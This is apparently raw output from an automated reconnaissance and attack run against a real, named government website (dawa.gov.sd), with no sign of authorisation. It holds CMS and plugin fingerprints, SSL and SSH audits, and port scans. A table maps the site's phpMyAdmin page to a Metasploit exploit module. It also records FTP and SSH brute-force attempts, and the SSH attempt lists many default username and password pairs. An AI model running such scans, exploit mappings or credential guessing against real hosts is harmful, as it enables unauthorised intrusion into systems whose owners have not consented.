- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 21.52 ms 10.246.200.1
- 2 21.91 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 99.40 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 20.55 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 29.14 ms motl-b1-link.telia.net (62.115.162.41)
- 6 126.93 ms nyk-bb4-link.telia.net (62.115.134.52)
- 7 126.59 ms ldn-bb4-link.telia.net (62.115.112.245)
- 8 126.56 ms prs-bb3-link.telia.net (62.115.134.92)
- 9 126.59 ms ffm-bb4-link.telia.net (62.115.122.139)
- 10 126.31 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 120.94 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
- 12 113.20 ms po-6.ce01.fra-10.de.leaseweb.net (178.162.223.155)
- 13 116.76 ms hosted-by.leaseweb.com (46.165.226.255)
- 14 113.26 ms 37.58.63.157
- #######################################################################################################################################
- http://dawa.gov.sd [200 OK] Country[GERMANY][DE], HTML5, IP[37.58.63.157], JQuery[1.12.4], MetaGenerator[Powered by Slider Revolution 5.2.3.5 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface.,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 5.0.4], PHP[7.0.33,], Plesk[Lin], PoweredBy[Slider,Visual], Script[text/javascript], UncommonHeaders[x-cache-status], WordPress[5.0.4], WordpressSuperCache, X-Powered-By[PHP/7.0.33, PleskLin]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://dawa.gov.sd...
- _________________________________________ SITE INFO __________________________________________
- IP Title
- 37.58.63.157
- __________________________________________ VERSION ___________________________________________
- Name Versions Type
- WordPress 5.0.4 CMS
- Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.4 | 2.4.5 | 2.4.6 | 2.4.7 Platform
- 2.4.8 | 2.4.9
- PHP 7.0.33 Platform
- ________________________________________ INTERESTING _________________________________________
- URL Note Type
- /readme.html Readme file Interesting
- /robots.txt robots.txt index Interesting
- /login/ Login Page Interesting
- ___________________________________________ TOOLS ____________________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- ______________________________________________________________________________________________
- Time: 265.6 sec Urls: 521 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Thu, 02 May 2019 11:12:30 GMT
- Content-Type: text/html; charset=UTF-8
- X-Powered-By: PHP/7.0.33
- Vary: Accept-Encoding,Cookie
- Cache-Control: max-age=3, must-revalidate
- X-Cache-Status: STALE
- X-Powered-By: PleskLin
- Connection: keep-alive
- HTTP/1.1 200 OK
- Date: Thu, 02 May 2019 11:12:31 GMT
- Content-Type: text/html; charset=UTF-8
- X-Powered-By: PHP/7.0.33
- Vary: Accept-Encoding,Cookie
- Cache-Control: max-age=3, must-revalidate
- X-Cache-Status: UPDATING
- X-Powered-By: PleskLin
- Connection: keep-alive
- #######################################################################################################################################
- OWL Carousel
- jQuery Migrate
- PHP 7.0.33
- WordPress Super Cache
- Revslider
- jQuery 1.12.4
- Underscore.js 1.8.3
- WordPress
- X-Cache-Status: HIT
- #######################################################################################################################################
- https://dawa.gov.sd [200 OK] Country[GERMANY][DE], HTML5, HTTPServer[nginx], IP[37.58.63.157], JQuery[1.12.4], MetaGenerator[Powered by Slider Revolution 5.2.3.5 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface.,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 5.0.4], PHP[7.0.33,], Plesk[Lin], PoweredBy[Slider,Visual], Script[text/javascript], UncommonHeaders[link,x-cache-status], WordPress[5.0.4], WordpressSuperCache, X-Powered-By[PHP/7.0.33, PleskLin], nginx
- #######################################################################################################################################
- OWL Carousel
- jQuery Migrate
- PHP 7.0.33
- WordPress Super Cache
- Revslider
- jQuery 1.12.4
- Underscore.js 1.8.3
- WordPress
- X-Cache-Status: MISS
- #######################################################################################################################################
- Version: 1.11.13-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 37.58.63.157
- Testing SSL server dawa.gov.sd on port 443 using SNI name dawa.gov.sd
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: Plesk
- Issuer: Plesk
- Not valid before: Jan 25 15:00:17 2017 GMT
- Not valid after: Jan 25 15:00:17 2018 GMT
- #######################################################################################################################################
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +------------+---------------------------------------+--------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +------------+---------------------------------------+--------------------------------------------------+----------+----------+
- | phpMyAdmin | https://37.58.63.157:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
- +------------+---------------------------------------+--------------------------------------------------+----------+---------
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:21 EDT
- Nmap scan report for 37.58.63.157
- Host is up (0.13s latency).
- Not shown: 459 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 7080/tcp open empowerid
- 8443/tcp open https-alt
- 8880/tcp open cddbp-alt
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:21 EDT
- Nmap scan report for 37.58.63.157
- Host is up (0.14s latency).
- Not shown: 9 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- 68/udp open|filtered dhcpc
- 139/udp open|filtered netbios-ssn
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:21 EDT
- Nmap scan report for 37.58.63.157
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp
- | fingerprint-strings:
- | GenericLines:
- | 220 ProFTPD Server (ProFTPD) [37.58.63.157]
- | Invalid command: try being more creative
- | Invalid command: try being more creative
- | NULL, SMBProgNeg:
- |_ 220 ProFTPD Server (ProFTPD) [37.58.63.157]
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 7201 guesses in 180 seconds, average tps: 36.3
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port21-TCP:V=7.70%I=7%D=5/2%Time=5CCAD2C4%P=x86_64-pc-linux-gnu%r(NULL,
- SF:2D,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\x20\[37\.58\.63\.157\]\r\n"
- SF:)%r(GenericLines,89,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\x20\[37\.5
- SF:8\.63\.157\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20c
- SF:reative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creati
- SF:ve\r\n")%r(SMBProgNeg,2D,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\x20\[
- SF:37\.58\.63\.157\]\r\n");
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.18 (94%), Oracle VM Server 3.4.2 (Linux 4.1) (92%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 22.03 ms 10.246.200.1
- 2 27.03 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 21.30 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 20.67 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 27.05 ms motl-b1-link.telia.net (62.115.162.41)
- 6 124.51 ms nyk-bb4-link.telia.net (62.115.134.52)
- 7 119.30 ms ldn-bb3-link.telia.net (62.115.113.21)
- 8 119.30 ms prs-bb4-link.telia.net (62.115.114.229)
- 9 118.90 ms ffm-bb4-link.telia.net (62.115.114.99)
- 10 118.89 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 113.15 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
- 12 112.93 ms po-8.ce01.fra-10.de.leaseweb.net (178.162.223.165)
- 13 115.88 ms hosted-by.leaseweb.com (46.165.226.253)
- 14 113.19 ms 37.58.63.157
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_7.4
- (gen) software: OpenSSH 7.4
- (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256 -- [warn] unknown algorithm
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
- (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- # message authentication code algorithms
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # algorithm recommendations (for OpenSSH 7.4)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:25 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
